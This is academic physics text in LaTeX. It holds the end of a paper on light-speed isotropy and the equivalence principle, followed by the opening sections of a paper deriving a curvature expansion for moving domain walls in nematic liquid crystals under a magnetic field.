is $c/\sqrt{1-\mu}$,
independently of the orientation; if something is seen by
$\Sigma$ to move at this speed, it is seen to move
at the same invariant speed by all frames, independently of the orientation.
On the other hand, light, which moves with respect to
$\Sigma$ according to $X=\pm cT$, moves, in our frame $S$,
according to $x=t(c\mp v)/(1\mp (1-\mu)v/c^{2})$,
the sign depending on the motion orientation.
Light speed is no more the maximum one, and, what is more relevant,
the one-way light velocities in $S$ are different.
The undetectability of a possible dependence of
the one-way velocity along a line on its orientation has been extensively
discussed in literature \cite{Rei28} \cite{Gru73}. As a consequence, $\mu=0$.
The last indisputable conclusion finds a confirmation in the following
experimental fact: electrons in the large accelerator machines have now
energies of $\sim 100$ Gev; at this energy,
$\frac{v^{2}}{c^{2}}\sim 1-2\cdot 10^{-11}$, but the
electrons have not reached the light
speed; we must have then
$\mu<2\cdot 10^{-11}$.
The situation does not change if we go beyond the lowest order and suppose
that $\mu$ is a function (even) of $v$.
\section {Local inertial systems}
The above considerations refer to situations in which we are performing
our experiments in frames which are seen by $\Sigma$ to move inertially.
Our conclusion is that, if the transformation between the preferred
frame and our one is taken to be linear, then it must have Lorentz form.
On the other hand, the anisotropy of the primordial radiation strongly
supports the existence of the preferred frame with respect to which
we are moving. It must then be analysed
how our state of non-inertial motion affects the experiments we are
discussing.
The starting point is the fact that
the background radiation intensity appears to be anisotropic to
an observer $O$,
at the origin of a reference frame $S$ in our region $R$ of the universe,
while it is isotropic from the point of view of an observer $\Omega$, at
the origin of a preferred reference frame $\Sigma$.
In the last case, the absolute
system $\Sigma$ and the relative
frame $S$ of our region of the universe detect differences in the
radiation background, but no differences in any {\it local}
experiment.
The region $R$ behaves like the world
inside an Einstein elevator; the Einstein equivalence
principle states that,
if $\Omega$ and $O$ perform, in their
respective regions, identical experiments
which are not influenced by the presence of local masses (Earth,
Sun, ...), they obtain identical results.
An immediate consequence is
that the inertia principle is valid for all local inertial systems.
This concept is very clearly stated by Hans Reichenbach \cite{Rei28}:
{\it According to Einstein, however, only these
local systems are the actual inertial systems. In them the field, which
generally consists of a gravitational and an inertial component, is
transformed in such manner that the gravitational component disappears
and only the inertial component
remains.}
Analogously, the local inertial systems associated to an Einstein
elevator are connected by linear transformations characterized by
an invariant velocity $c$.
So, our region $R$ and another region $R'$ in the universe have
separate families of local inertial frames, characterized by identical light
speeds, although these ones
may appear different when measured by an asymptotic observer
who sees how space curvature modifies in going from $R$ to $R'$.
A well known example is given by the time delay measured in the Shapiro
\cite {Sha71} and Reasenberg \cite{Rea79} experiments: an asymptotic
observer detects a delay in the light trip, but any observer, who is
in the region this ray is passing through, says that it is moving at the
speed of $c$.
Coming back to the experiments performed in presence of Earth and Sun,
we do not exclude that local observers may see general
relativistic effects induced by their masses \cite{Cha83}.
The light behaviour is, however,
locally influenced by the gravity only for a
bending which is very small and difficult to detect \cite{Pre98};
this is not true for the motions
of the satellytes involved in some of the quoted experiments.
All gravity effects due to the nearest relevant masses
have been consistently taken into account in the previous experiments,
which must be highly considered for their precision.
The conclusions of these experiments is
that, apart from some very small local effects,
the Lorentz transformation applies in our region $R$, and that
that our region belongs to a family of local inertial frames.
The force which induces the acceleration seen by some asymptotic observer
is completely cancelled by the equivalence principle.
\section{Conclusions}
If there is no way to perform
independent measures of lengths and light velocities; in other words,
if the light velocity is used both for synchronizing clocks and for
fixing the unit lengths,
there is no way of locally detecting any dependence on the orientation of
the length of) a rod. The only thing to do is to use the Poincar\'e
simplicity criterion and consider equal the lengths of the rods and the
one-way speeds of light in the different directions.
In conclusion, isotropy in the one-way velocity of light is a matter of
definition.
However,
the experiments quoted at the beginning, in particular those
performed by J. Hall and coworkers at very
sophisticated levels, cannot be considered
simply significant improvements of
classical special relativity tests.
As discussed in the introduction,
this would surely be the case
if the quoted experiments had been performed in a region where
gravity effects are compensated. But the presence of an anisotropic
background radiation, when interpreted as testimonial of an
analogous anisotropic mass distribution, and the fact that these
experiments find their explanation in the frame of the special
relativity, strongly support the equivalence principle.
In conclusion we strongly suggest that the
accurate conclusions of such experiments
should be considered significant tests of both special relativity
and the equivalence principle.
\section{Acknowledgments}
Thanks are due to professors John L. Hall and Giuseppe Marmo for useful
discussions; we are indebted too with G.Marmo and G. Esposito for a
critical reading of the manuscript. Thanks are also due to an anonymous
referee who has helped in improving the presentation of the paper.
| 2024-02-18T23:40:13.362Z | 1998-11-03T12:15:54.000Z | algebraic_stack_train_0000 | 1,721 | 2,359 |
|
proofpile-arXiv_065-8405 | \section{Introduction }
Liquid crystals are probably the best materials for experimental and
theoretical studies of topological defects. Variety of defects,
relatively simple experiments in which one can observe them, and soundness
of theoretical models of dynamics of relevant order parameters make liquid
crystals unique in this respect. Literature on topological defects in
liquid crystals is enormous, therefore we do not attempt to review it
here. Let us only point the books \cite{1}, \cite{2}, \cite{3} in which
one can find lucid introductions to the topic as well as collections of
references.
Our paper is devoted to dynamics of domain walls in uniaxial nematic liquid
crystals in an external magnetic field. Static, planar domain walls were
discussed for the first time in \cite{5}. We would like to
approximately calculate director field of a curved domain wall. We use a
method, called the improved expansion in width, whose general theoretical
formulation has been given in \cite{5, 6}. Appropriately adapted
expansion in width can also be applied to disclination lines \cite{7}.
The expansion in width is based on the idea
that transverse profiles of the curved domain wall and of a planar one
differ from each other by small corrections which are due to
curvature of the domain wall. We calculate these corrections perturbatively.
Formally, we expand the director field in a
parameter which gives the width of the domain wall, that is the magnetic
coherence length $\xi_m$ in the case at hand, but actually terms in the
expansion involve dimensionless ratios $\xi_m/R_i$, where $R_i$ are (local)
curvature radia of the domain wall. Therefore, our expansion is expected to
provide a good approximation when curvature radia of the domain wall are
much larger than the magnetic coherence length.
For planar domain walls the perturbative
solution reduces to just one term which coincides with a well-known exact
solution. As we shall see below, the improved expansion in width is not
quite straightforward -- there are consistency conditions and rather special
coordinate system is used -- but that should be regarded as a reflection
of nontriviality of evolution of curved domain walls.
Actually, several first terms in the expansion can be calculated without any
difficulty, and the whole approach looks quite promising.
In the present paper we consider the simplest and rather elegant
case of equal elastic constants.
In order to take into account differences of values of the elastic
constants for real liquid crystals one can use, for example, the following
two strategies: perturbative expansion with respect to
deviations of the elastic constants from their mean
value, or the expansion in width generalized to the unequal constants case.
In the former approach, the equal constant approximate solution obtained in
the present paper can be used as the starting point for calculating
corrections. The case of unequal elastic constants we will discuss in a
subsequent paper.
The plan of our paper is as follows. We begin with general description
of domain walls in uniaxial nematic liquid crystals in Section 2. Next,
in Section 3, we introduce a special coordinate system comoving with the
domain wall. Section 4 contains description of the improved expansion in
width. In Section 5 we discuss consecutive terms in the expansion up to
the second order in $\xi_m$. Several remarks related to our work are
collected in Section 5.
\section{ Domain walls in nematic liquid crystals }
In this Section we recall basic facts about domain walls in uniaxial nematic
liquid crystals \cite{1}, \cite{2}. We fix our notation and sketch background
for the calculations presented in next two Sections.
We shall parametrize the director field $\vec{n}(\vec{x},t)$ by two angles
$\Theta(\vec{x},t)$, $\Phi(\vec{x},t)$:
\begin{equation}
\vec{n} = \left(
\begin{array}{c}
\sin\Theta \cos\Phi \\ \sin\Theta \sin\Phi \\ \cos\Theta
\end{array}
\right).
\end{equation}
In this way we get rid of the constraint $\vec{n}^2 = 1.$
We assume that the splay, twist and bend elastic constants are equal
($K_{11} = K_{22} = K_{33} = K$). In this case Frank---Oseen---Z\"ocher
elastic free energy density can be written in the form
\begin{equation}
{\cal F}_e = \frac{K}{2} (\partial_{\alpha}\Theta \partial_{\alpha}\Theta
+ \sin^2\Theta \partial_{\alpha}\Phi \partial_{\alpha}\Phi ).
\end{equation}
Our notation is as follows: $\alpha=1,2,3$; $\;\partial_{\alpha} =
\partial / \partial x^{\alpha}$; $\;x^{\alpha} $
are Cartesian coordinates in the usual 3-dimensional space $R^3$;
$\;\vec{x} = (x^{\alpha})$. In formula (2) we have abandoned a surface
term which is irrelevant for our considerations.
In order to have stable domain walls it is necessary to apply an external
magnetic field $\vec{H}_0$ \cite{1}, \cite{2}.
We assume that $\vec{H}_0$ is constant in space and time. Without any loss
in generality we may take
\[ \vec{H}_0 = \left(
\begin{array}{c}
0 \\ 0 \\ H_0
\end{array}
\right).
\]
Then the magnetic field contribution to free energy density of the nematic
is given by the following formula
\begin{equation}
{\cal F}_m = - \frac{1}{2} \chi_a H_0^2 \cos^2\Theta.
\end{equation}
Here $\chi_a$ is the anisotropy of the magnetic susceptibility. It can be
either positive or negative. For concreteness, we shall assume that
$\chi_a > 0.$ Our calculations can easily be repeated if $\chi_a < 0.$
The ground state of the nematic is double degenerate: $\Theta = 0$
and $\Theta = \pi$ give minimal total free energy density
$ {\cal F} = {\cal F}_e + {\cal F}_m. $
It is due to this degeneracy that stable domain walls can exist.
Dynamics of the director field is mathematically described by the equation
\begin{equation}
\gamma_1 \frac{\partial \vec{n}}{\partial t} + \frac{\delta F}{\delta
\vec{n}} = 0,
\end{equation}
where
\[ F = \int d^3x {\cal F}. \]
$\gamma_1$ is the rotational viscosity of the liquid crystal, and
$\delta/\delta\vec{n}$ denotes the variational derivative with respect to
$\vec{n}$. Equation (4)
is equivalent to the following equations for the $\Theta$ and $\Phi$ angles
\begin{equation}
\gamma_1 \frac{\partial \Theta}{\partial t} =
K \Delta \Theta - \frac{K}{2} \sin(2\Theta) \partial_{\alpha}\Phi
\partial_{\alpha}\Phi - \frac{1}{2} \chi_a H_0^2 \sin(2\Theta),
\end{equation}
\begin{equation}
\gamma_1 \sin^2\Theta \frac{\partial \Phi}{\partial t} =
K \partial_{\alpha}(\sin^2\Theta \partial_{\alpha} \Phi),
\end{equation}
where $\Delta = \partial_{\alpha}\partial_{\alpha}$.
The domain walls arise when the director field is parallel to the
magnetic field $\vec{H}_0$ in one part of the space and anti-parallel to it
in another. In between there is a layer -- the domain wall -- across which
$\vec{n}$ smoothly changes its orientation from parallel to $\vec{H}_0$
to the opposite one, that is $\Theta$ varies from 0 to $\pi$ or vice versa.
The angle $\Phi$ does not play important role. The Ansatz
\begin{equation}
\Phi = \Phi_0
\end{equation}
with constant $\Phi_0$ trivially solves Eq.(6). Then, Eq.(5) is the only
equation we have to solve. In the following we
assume the Ansatz (7), hereby restricting the class of domain walls we
consider. It is clear from formula (2) that domain walls with varying
$\Phi$ have higher elastic free energy than the walls with constant $\Phi$.
Let us recall the static planar domain wall \cite{1, 2}. We assume that it
is parallel to the $x^1 = 0$ plane. Then
\begin{equation}
\Theta = \Theta_0(x^1), \;\; \Phi_0 = \mbox{const},
\end{equation}
where
\begin{equation}
\Theta_0 \left.\right|_{x^1 \rightarrow -\infty} = 0, \;\;
\Theta_0 \left.\right|_{x^1 \rightarrow +\infty} = \pi.
\end{equation}
One could also consider an "anti-domain wall" obtained by interchanging 0 and
$\pi$ on the r.h.s. of boundary conditions (9). Equation (5) is now reduced
to the following equation
\begin{equation}
K \Theta_0^{''} = \frac{1}{2} \chi_a H_0^2 \sin(2\Theta_0),
\end{equation}
where ' denotes $d/dx^1$. This equation is well-known in soliton theory
as the sine-Gordon equation, see e.g., \cite{8}.
It is convenient to introduce the magnetic coherence length $\xi_m$,
\begin{equation}
\xi_m =\left( K/ \chi_a H^2_0\right)^{1/2}.
\end{equation}
The functions
\begin{equation}
\Theta_0(x^1) = 2 \arctan(\exp \frac{x^1 - x^1_0}{\xi_m})
\end{equation}
with arbitrary constant $x^1_0$ obey Eq.(10) as well as the boundary
conditions (9). The planar domain walls are homogeneous in the $x^1=0$
plane. Their transverse profile is parametrized by $x^1$. Width of the wall
is approximately equal to $\xi_m$, in the sense that for $|x^1 - x^1_0| \gg
\xi_m$ values of $\Theta_0$ differ from 0 or $\pi$ by exponentially small
terms.
The planar domain wall solution of Eqs.(5), (6) contains two arbitrary
constants: $\Phi_0$ and $x^1_0$. The arbitrariness of $\Phi_0$ is due to the
assumption that the elastic constants are equal. Then the free energy density
${\cal F}$ is invariant with respect to $\Phi \rightarrow \Phi +
\mbox{const}$. If the elastic constants are not equal this invariance is
lost, and in the case of planar domain walls $\Phi_0$ can
take only discrete values $n \pi/2, n=0,1,2,3.$
The constant $x^1_0$ appears because of invariance of Eqs.(5), (6)
with respect to the translations $x^1 \rightarrow x^1 + \mbox{const}$.
Notice that $\Theta_0(x^1_0) = \pi/2$. Hence at $x^1 = x^1_0$ the director
$\vec{n}$ is perpendicular to $\vec{H}_0$. In fact, the boundary conditions
(9) imply that for any domain wall there is a surface on which
$\vec{n}\vec{H}_0 =0$. Such surface is called the core of the domain wall.
The magnetic free energy density ${\cal F}_m$ has a maximum on the core.
The planar domain wall (12) plays very important role in our approach. In a
sense, it is taken as the zeroth order approximation to curved domain walls.
The trick consists in using a special coordinate system comoving with the
curved domain wall. Such a coordinate system encodes shape and motion of
the domain wall regarded as a surface in the space. Internal dynamics of
the domain wall, like details of orientation of the director inside the
domain wall, is then calculated perturbatively in the comoving reference
frame with the function (12) taken as the leading term.
\section{The comoving coordinates}
The first step in our construction of the perturbative solution consists
in introducing the coordinates comoving with the domain wall.
Two coordinates ($\sigma^1,\; \sigma^2$) parametrize the domain wall
regarded as a surface in the $R^3$ space, and one coordinate, let say $\xi$,
parametrizes the direction perpendicular to the domain wall. For convenience
of the reader we quote main definitions and formulas below \cite{6}.
We introduce a smooth, closed or infinite surface $S$ in the usual $R^3$
space. It is supposed to lie close to the domain wall. Its shape mimics
the shape of the domain wall. In particular we may assume that
$S$ coincides with the core at certain time $t_0$.
Points of $S$ are given by $\vec{X}(\sigma^i,t)$, where $\sigma^i$ $(i=1,2)$
are two intrinsic coordinates on $S$, and $t$ denotes the time. We
allow for motion of $S$ in the space. The vectors $\vec{X}_{,k},\; k=1,2$,
are tangent to $S$ at the point $\vec{X}(\sigma^i,t)$ \footnote{We use the
notation $f_{,k} \equiv \partial f / \partial\sigma^k$.}. They are
linearly independent, but not necessarily orthogonal to each other. At each
point of $S$ we also introduce a unit vector
$\vec{p}(\sigma^i,t)$ perpendicular to $S$, that is
\[ \vec{p} \vec{X}_{,k} =0,\;\;\; \vec{p}^2 =1. \]
The triad $(\vec{X}_{,k}, \vec{p})$ forms a local basis at the point
$\vec{X}$ of $S$. Geometrically, $S$ is characterized by the
induced metric tensor on $S$
\[ g_{ik} = \vec{X}_{,i} \vec{X}_{,k}, \]
and by the extrinsic curvature coefficients of $S$
\[ K_{il} = \vec{p}\vec{X}_{,il}, \]
where $i,k,l=1,2$. They appear in Gauss-Weingarten formulas
\begin{equation}
\vec{X}_{,ij} = K_{ij} \vec{p} + \Gamma^l_{ij} \vec{X}_{,l}, \;\;\;\;
\vec{p}_{,i} = - g^{jl} K_{li} \vec{X}_{,j}.
\end{equation}
The matrix $(g^{ik})$ is by definition the inverse of the matrix
$(g_{kl})$, i.e.
$g^{ik}g_{kl}= \delta^i_l$, and $\Gamma^l_{ik}$ are Christoffel symbols
constructed from the metric tensor $g_{ik}$. Two eigenvalues $k_1,k_2$ of
the matrix $(K^i_j)$, where $K^i_j = g^{il}K_{lj}$, are called extrinsic
curvatures of $S$ at the point $\vec{X}$. The main curvature radia are
defined as $R_i =1/k_i$.
The comoving coordinates $(\sigma^1, \sigma^2,\xi)$ are introduced by the
following formula
\begin{equation}
\vec{x} = \vec{X}(\sigma^i,t) + \xi \vec{p}(\sigma^i,t).
\end{equation}
$\xi$ is the coordinate in the direction perpendicular to the surface $S$.
In the comoving coordinates this surface has very simple equation: $\xi = 0.$
We will use the compact notation:
$(\sigma^1, \sigma^2, \xi) = (\sigma^{\alpha})$, where $\alpha$=1, 2, 3
and $\sigma^3 = \xi$. The coordinates $(\sigma^{\alpha})$ are just a special
case of curvilinear coordinates in the space $R^3$. In these coordinates the
metric tensor $(G_{\alpha \beta})$ in $R^3$ has the following components:
\[ G_{33} =1, \;\; G_{3k} = G_{k3} =0, \;\; G_{ik} = N^l_i g_{lr}N^r_k, \]
where
\[ N^l_i = \delta^l_i - \xi K^l_i, \]
$i,k,l,r =1,2$. Simple calculations give
\[ \sqrt{G} =\sqrt{g} N, \]
where $G=det(G_{\alpha\beta}),
\;\; g=det(g_{ik})$ and $ N=det(N_{ik}).$ For $N$ we obtain the
following formula
\[ N = 1 - \xi K^i_i + \frac{1}{2} \xi^2 (K_i^i K^l_l - K^i_lK^l_i). \]
Components $G^{\alpha \beta}$ of the inverse metric tensor in $R^3$ have
the form
\[ G^{33} =1,\;\; G^{3k}=G^{k3}=0, \;\; G^{ik}= (N^{-1})^i_r g^{rl}
(N^{-1})^k_l, \]
where
\[ (N^{-1})^i_r = \frac{1}{N}
\left((1-\xi K^l_l) \delta^i_r + \xi K^i_r \right). \]
We see that dependence on the transverse coordinate
$\xi$ is explicit, while $\sigma^1, \sigma^2$ appear through the tensors
$g_{ik}, \; K^l_r$ which characterize the surface $S$.
The comoving coordinates $(\sigma^{\alpha})$ have in general certain finite
region of validity. In particular, the range of $\xi$ is given by the smallest
positive $\xi_0(\sigma^i,t)$ for which $G = 0$. It is clear that such $\xi_0$
increases with decreasing extrinsic curvature coefficients $K_i^l$, reaching
infinity for the planar domain wall, for which $K_j^i = 0$. We assume that
the surface $S$ (hence also the domain wall) is not curved too much. Then,
that region is large enough, so that outside it
there are only exponentially small tails of the domain wall which give
negligible contributions to physical characteristics of the domain wall.
The comoving coordinates are utilised to write Eq.(5) in a form suitable
for calculating the curvature corrections. Let us start from the Laplacian
$\Delta\Theta$. In the new coordinates it has the form
\[
\Delta\Theta = \frac{1}{\sqrt{G}} \frac{\partial}{\partial\sigma^{\alpha}}
\left(\sqrt{G} G^{\alpha\beta}\frac{\partial\Theta}{\partial \sigma^{\beta}}
\right).
\]
The time derivative on the l.h.s. of Eq.(5) is taken under the condition
that all $x^{\alpha}$ are constant. It is convenient to use time derivative
taken at constant $\sigma^{\alpha}$. The two derivatives are related by
the formula
\[
\frac{\partial}{\partial t}|_{x^{\alpha}} =
\frac{\partial}{\partial t}|_{\sigma^{\alpha}} +
\frac{\partial \sigma^{\beta}}{\partial t}|_{x^{\alpha}}
\frac{\partial}{\partial \sigma^{\beta}},
\]
where
\[ \frac{\partial \xi}{\partial t}|_{x^{\alpha}}
= - \vec{p}\dot{\vec{X}}, \;\;\;
\frac{\partial \sigma^i}{\partial t}|_{x^{\alpha}} = - (N^{-1})^i_k
g^{kr} \vec{X}_{,r} (\dot{\vec{X}} + \xi \dot{\vec{p}}),
\]
the dots stand for $\partial /\partial t |_{\sigma^i}$.
Let us also introduce the dimensionless coordinate
\[ s = \xi / \xi_m. \]
Now we can write equation (5) transformed to the comoving coordinates
$(\sigma^i, s)$ (with the Ansatz (7) taken into account):
\[
\frac{\gamma_1}{K} \xi_m^2
\left( \frac{\partial \Theta}{\partial t}|_{\sigma^{\alpha}}
- \frac{1}{\xi_m}\vec{p}\dot{\vec{X}} \frac{\partial\Theta}{\partial s}
- (N^{-1})^i_k g^{kr} \vec{X}_{,r} (\dot{\vec{X}} + \xi_m s
\dot{\vec{p}}) \frac{\partial\Theta}{\partial\sigma^i} \right)
\]
\begin{equation}
= \frac{\partial^2 \Theta}{\partial s^2} -
\frac{1}{2} \sin(2\Theta) + \frac{1}{N} \frac{\partial N}{\partial s}
\frac{\partial \Theta}{\partial s} + \xi_m^2 \frac{1}{\sqrt{g} N}
\frac{\partial}{\partial \sigma^j} \left(G^{jk}\sqrt{g} N
\frac{\partial \Theta}{\partial \sigma^k} \right),
\end{equation}
Equation (15) is the starting point for construction of the expansion
in width.
\section{The improved expansion in width}
We seek domain wall solutions of Eq.(15) in the form of expansion with
respect to $\xi_m$, that is
\begin{equation}
\Theta = \Theta_0 + \xi_m \Theta_1 + \xi_m^2 \Theta_2 + ... \;\;\; .
\end{equation}
Inserting formula (16) in Eq.(15) and keeping only terms of the lowest
order ($\sim \xi_m^0$) we obtain the following equation
\begin{equation}
\frac{\partial^2 \Theta_0}{\partial s^2} = \frac{1}{2} \sin(2\Theta_0),
\end{equation}
which essentially coincides with Eq.(10) after the rescaling $x^1 = \xi_m s$.
Its solutions
\[
\Theta_{s_0}(s) = 2 \arctan(\exp(s-s_0)),
\]
essentially have the same form as the planar domain walls (12), but now $s$
gives the distance from the surface $S$. This surface will be determined
later. In the remaining part of the paper we shall consider curvature
corrections to the simplest solution
\begin{equation}
\Theta_0(s) = 2 \arctan(\exp s).
\end{equation}
Because already $\Theta_0$ interpolates between the ground state solutions
$0, \pi$, the corrections $\Theta_k, \; k \geq 1,$ should vanish in the
limits $s \rightarrow \pm \infty$.
Equations for the corrections $\Theta_k, \; k\geq1,$ are obtained by
expanding both sides of Eq.(15) and equating terms proportional
to $\xi_m^k$. These equations can be written in the form
\begin{equation}
\hat{L} \Theta_k = f_k,
\end{equation}
with the operator $\hat{L}$
\begin{equation}
\hat{L} = \frac{\partial^2}{\partial s^2} - \cos(2\Theta_0) =
\frac{\partial^2}{\partial s^2} + \frac{2}{\cosh^2 s} -1.
\end{equation}
The last equality in (20) can be obtained, e.g., from Eq.(17):
inserting $\Theta_0$ given by formula (18) on the l.h.s. of
Eq.(17) we find that $ \sin(2 \Theta_0) = - 2 \sinh s/ \cosh^2 s$, and
$\cos(2\Theta_0) = 1 - 2/\cosh^2s. $
The expressions $f_k$ on the r.h.s. of Eqs.(19) depend on the lower order
contributions $\Theta_l, \; l<k$. Straightforward calculations give
\begin{equation}
f_1 = \partial_s\Theta_0 ( K^r_r - \frac{\gamma_1}{K} \vec{p}\dot{\vec{X}}),
\end{equation}
\begin{equation}
f_2 = - \sin(2\Theta_0) \Theta_1^2 + s \partial_s\Theta_0 K^i_j K^j_i
+ \partial_s\Theta_1 ( K^r_r - \frac{\gamma_1}{K} \vec{p}\dot{\vec{X}}),
\end{equation}
\begin{eqnarray}
& f_3 = \frac{\gamma_1}{K} (\partial_t\Theta_1 - g^{kr}\vec{X}_{,r}
\dot{\vec{X}} \partial_k\Theta_1 ) - 2 \sin(2\Theta_0) \Theta_1 \Theta_2
- \frac{2}{3} \cos(2\Theta_0) \Theta_1^3 & \nonumber \\
&+ s \partial_s\Theta_1 K^i_jK^j_i - \frac{1}{2} s^2 \partial_s\Theta_0 K^r_r
\left( (K^i_i)^2 - 3 K^i_jK^j_i\right) & \nonumber \\
& - \frac{1}{\sqrt{g}}\partial_j(\sqrt{g}g^{jk}\partial_k\Theta_1) +
\partial_s\Theta_2 ( K^r_r - \frac{\gamma_1}{K} \vec{p}\dot{\vec{X}}),
\end{eqnarray}
and
\begin{eqnarray}
& f_4 = \frac{\gamma_1}{K} ( \partial_t\Theta_2
- s g^{ik} \dot{\vec{p}}\vec{X}_{,k}\partial_i\Theta_1 )
- \frac{\gamma_1}{K} g^{jk} \vec{X}_{,k}\dot{\vec{X}} (\partial_j\Theta_2 +
s K^i_j\partial_i\Theta_1 ) & \nonumber \\
& - \sin(2\Theta_0) (\Theta_2^2 +2 \Theta_1 \Theta_3 -
\frac{1}{3} \Theta_1^4) - 2 \cos(2\Theta_0) \Theta_1^2 \Theta_2 &
\nonumber \\
& + s \partial_s \Theta_2 K^i_jK^j_i
+ s^3 \partial_s\Theta_0 \left( (K^r_r)^4 + \frac{1}{2} (K^r_sK^s_r)^2
- 2 (K^r_r)^2 K^i_jK^j_i \right) & \nonumber \\
& - \frac{s^2}{2} \partial_s\Theta_1 K^r_r \left(
(K^i_i)^2 - 3 K^i_jK^j_i \right)
- \frac{1}{\sqrt{g}}\partial_j(\sqrt{g}g^{jk}\partial_k\Theta_2)
& \nonumber \\
& -\frac{2s}{\sqrt{g}} \partial_j(\sqrt{g}K^{jk}\partial_k\Theta_1)
+ s g^{jk}(\partial_jK^r_r) \partial_k\Theta_1 + \partial_s\Theta_3
( K^r_r - \frac{\gamma_1}{K} \vec{p}\dot{\vec{X}}),
\end{eqnarray}
where $\partial_t = \partial /\partial t,\;\; \partial_i = \partial /
\partial \sigma^i$. We have taken into account the fact that $\Theta_0$ does
not depend on $\sigma^i$.
Notice that all Eqs.(19) for $\Theta_k$ are linear. The only nonlinear
equation in our perturbative scheme is the zeroth order equation (17).
It is very important to observe that operator $\hat{L}$ has a zero-mode,
that is a function $\psi_0(s)$ which quickly vanishes in the limits
$s \rightarrow \pm \infty$, and which obeys the equation
\[
\hat{L} \psi_0 =0.
\]
Inserting $\Theta_{s_0}(s)$ in Eq.(17), differentiating that equation with
respect to $s_0$ and putting $s_0=0$ we obtain as an identity that
$\hat{L}\psi_0 = 0$ where
\begin{equation}
\psi_0(s) = \frac{1}{\cosh s}.
\end{equation}
The presence of this zero-mode is related to the invariance of Eq.(17)
with respect to translations in $s$, therefore it is often called the
translational zero-mode. Let us multiply both sides of Eqs.(19) by
$\psi_0(s)$ and integrate over $s$. Integration by parts gives
\[
\int^{\infty}_{-\infty} ds \psi_0 \hat{L} \Theta_k =
\int^{\infty}_{-\infty} ds \Theta_k \hat{L} \psi_0 = 0.
\]
Hence, we obtain the consistency (or integrability) conditions
\begin{equation}
\int^{\infty}_{-\infty} ds \psi_0(s) f_k(s) =0,
\end{equation}
where $f_k$ are given by formulas of the type (21) - (24). We shall see in
the next Section that these conditions play very important role in
determining the curved domain wall solutions.
Using standard methods \cite{9} one can obtain the following formulas for
vanishing in the limits $s \rightarrow \pm \infty$ solutions $\Theta_k$
of Eqs.(19):
\begin{equation}
\Theta_k = G[f_k] + C_k(\sigma^i, t) \psi_0(s),
\end{equation}
where
\begin{equation}
G[f_k] = - \psi_0(s) \int^s_0 dx \psi_1(x) f_k(x) + \psi_1(s)
\int^s_{-\infty} dx \psi_0(x) f_k(x).
\end{equation}
Here $\psi_0(s)$ is the zero-mode (25) and
\begin{equation}
\psi_1(s) = \frac{1}{2} (\sinh s + \frac{s}{\cosh s})
\end{equation}
is the other solution of the homogeneous equation
\[
\hat{L} \psi = 0.
\]
The second term on the r.h.s. of formula (27) obeys the homogeneous
equation $\hat{L}\Theta_k =0$. It vanishes when $s \rightarrow \pm \infty$.
The solutions (27) contain as yet arbitrary functions $C_k(\sigma^i, t)$.
Also $\vec{X}(\sigma^i, t)$ giving the comoving surface $S$ has not been
specified. It turns out that conditions (26) are so restrictive that they
essentially fix those functions. The extrinsic curvature coefficients
$K^i_l$ and the metric $g_{ik}$ will follow from $\vec{X}(\sigma^i,t)$.
One can worry that $G[f_k], \; k\geq 1$, given by formula (28)
do not vanish when $s\rightarrow \pm \infty$ because the second term on
the r.h.s. of formula (28) is proportional to $\psi_1$, which
exponentially increases in the limits $s \rightarrow \pm \infty$.
However, the integrals
\[ \int^s_{-\infty} dx \psi_0 f_k \]
vanish in that limit due to the consistency conditions (26). Moreover,
qualitative analysis of Eq.(15) shows that $f_k \sim
(\mbox{polynomial in}\; s) \times \exp(-|s|)$ for large $|s|$, hence those
integrals behave like $(\mbox{polynomial in}\;s) \times \exp(-2|s|)$ for
large $|s|$ ensuring that all $G[f_k]$ exponentially vanish when
$|s| \rightarrow \infty$.
\section{The approximate domain wall solutions}
In this Section we discuss the approximate solutions obtained with the help
of the perturbative scheme we have just described. We present formulas for
$\Theta_1$ and $\Theta_2$, an equation for $\vec{X}(\sigma^i, t)$ which
determines motion of the surface $S$, as well as equations for the
functions $C_1,\;C_2$.
The zeroth order solution is already known, see formula (18). This allows us
to discuss the consistency condition with $k=1$. Substituting $f_1$ from
formula (21) and noticing that
\[ \partial_s \Theta_0 = \frac{1}{\cosh s} = \psi_0(s) \]
we find that that condition is equivalent to
\begin{equation}
\frac{\gamma_1}{K} \vec{p} \dot{\vec{X}} = K^r_r.
\end{equation}
This condition is in fact the equation for $\vec{X}$. It is of the same
type as Allen-Cahn equation \cite{10}, but in our approach it governs
motion of the auxiliary surface $S$.
Let us now turn to the perturbative corrections. After taking into account
Allen-Cahn equation (30) we have $f_1 =0$. Therefore, the total
first order contribution has the form
\begin{equation}
\Theta_1 = \frac{C_1(\sigma^i,t)}{\cosh s}.
\end{equation}
The second order contribution $\Theta_2$ is calculated from formula (28)
with $f_2$ given by formula (22).
Using the results (30), (31) we obtain the following
formula
\begin{equation}
\Theta_2 = \psi_2(s) C_1^2(\sigma^i,t) + \psi_3(s) K^i_jK^j_i +
\frac{C_2(\sigma^i,t)}{\cosh s},
\end{equation}
where
\[ \psi_2(s) = - \frac{\sinh s}{2\cosh^2s},
\]
\[
\psi_3(s) = \frac{1}{2}s \cosh s - \frac{s}{2\cosh s}
- \psi_1(s) \ln(2\cosh s)
\]
\[
+ \frac{s^2\sinh s}{4\cosh^2s} - \frac{1}{4 \cosh s} \int^s_0 dx
\frac{x^2}{\cosh^2x}.
\]
The integral in $\psi_3(s)$ can easily be evaluated numerically. Due to the
consistency conditions, the functions $C_1, C_2$ in formulas (31), (32) are
not arbitrary, see below.
The consistency condition (26) with $k=2$ does not give any restrictions ---
it can be reduced to the identity $0 = 0$. More interesting is the next
condition, that is the one with $k=3$. Inserting formula (23) for $f_3$ and
calculating necessary integrals over $s$ we find that it can be written in
the form of the following inhomogeneous equation for $C_1(\sigma^i,t)$
\begin{eqnarray}
& \frac{\gamma_1}{K} ( \partial_t C_1 - g^{kr} \vec{X}_{,r}\dot{\vec{X}}
\partial_k C_1 ) - \frac{1}{\sqrt{g}}\partial_j(\sqrt{g} g^{jk}\partial_kC_1)
- K^i_j K^j_i C_1 & \nonumber \\
& = \frac{\pi^2}{24} K^r_r\left((K^i_i)^2 - 3 K^i_jK^j_i\right). &
\end{eqnarray}
We have also used Allen-Cahn equation (30). Equation (33) determines $C_1$
provided that we fix initial data for it. Similarly, the consistency
condition coming from the fourth order ($k=4$) is
equivalent to the following homogeneous equation for $C_2$
\begin{eqnarray}
& \frac{\gamma_1}{K} ( \partial_t C_2 - g^{kr} \vec{X}_{,r}\dot{\vec{X}}
\partial_k C_2 ) & \nonumber \\
& - \frac{1}{\sqrt{g}} \partial_j(\sqrt{g} g^{jk}\partial_kC_2)
- K^i_j K^j_i C_2 = 0. &
\end{eqnarray}
